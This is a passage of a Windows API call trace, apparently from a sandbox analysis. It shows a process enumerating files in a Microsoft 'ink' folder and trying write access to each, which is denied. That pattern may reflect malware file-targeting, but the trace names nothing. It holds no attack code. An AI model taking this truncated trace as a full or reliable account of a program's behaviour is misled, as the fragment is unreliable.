InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0099.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.874] AreFileApisANSI () returned 1 [0099.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe", lpUsedDefaultChar=0x0) returned 76 [0099.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0099.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.874] AreFileApisANSI () returned 1 [0099.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x851c0 [0099.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe") returned 76 [0099.874] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.874] GetFileType (hFile=0x368) returned 0x1 [0099.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0099.875] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.875] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.875] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.875] CloseHandle (hObject=0x368) returned 1 [0099.875] AreFileApisANSI () returned 1 [0099.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85760 [0099.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x85760, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe") returned 76 [0099.876] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.876] GetLastError () returned 0x5 [0099.876] GetLastError () returned 0x5 [0099.876] SetLastError (dwErrCode=0x5) [0099.876] GetLastError () returned 0x5 [0099.876] SetLastError (dwErrCode=0x5) [0099.876] GetLastError () returned 0x5 [0099.876] SetLastError (dwErrCode=0x5) [0099.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85760 | out: hHeap=0x20000) returned 1 [0099.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0099.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.876] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x972, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsar.xml", cAlternateFileName="")) returned 1 [0099.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0099.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0099.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0099.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.877] AreFileApisANSI () returned 1 [0099.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml", lpUsedDefaultChar=0x0) returned 61 [0099.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.877] AreFileApisANSI () returned 1 [0099.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0099.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e3e8 [0099.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6e3e8, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 61 [0099.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.878] GetFileType (hFile=0x368) returned 0x1 [0099.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0099.879] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.879] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.879] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.879] CloseHandle (hObject=0x368) returned 1 [0099.879] AreFileApisANSI () returned 1 [0099.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0099.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6dfa8 [0099.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 61 [0099.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.879] GetLastError () returned 0x5 [0099.879] GetLastError () returned 0x5 [0099.879] SetLastError (dwErrCode=0x5) [0099.879] GetLastError () returned 0x5 [0099.880] SetLastError (dwErrCode=0x5) [0099.880] GetLastError () returned 0x5 [0099.880] SetLastError (dwErrCode=0x5) [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.880] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.880] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.880] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5ef58 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0099.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0099.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0099.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.881] AreFileApisANSI () returned 1 [0099.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml", lpUsedDefaultChar=0x0) returned 62 [0099.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.881] AreFileApisANSI () returned 1 [0099.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6de98 [0099.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6de98, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml") returned 62 [0099.881] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.881] GetFileType (hFile=0x368) returned 0x1 [0099.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0099.882] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.882] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.882] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.882] CloseHandle (hObject=0x368) returned 1 [0099.885] AreFileApisANSI () returned 1 [0099.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e470 [0099.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml") returned 62 [0099.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.885] GetLastError () returned 0x5 [0099.885] GetLastError () returned 0x5 [0099.885] SetLastError (dwErrCode=0x5) [0099.885] GetLastError () returned 0x5 [0099.885] SetLastError (dwErrCode=0x5) [0099.885] GetLastError () returned 0x5 [0099.885] SetLastError (dwErrCode=0x5) [0099.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0099.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.886] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.886] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.886] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0099.886] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.886] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.886] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.886] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 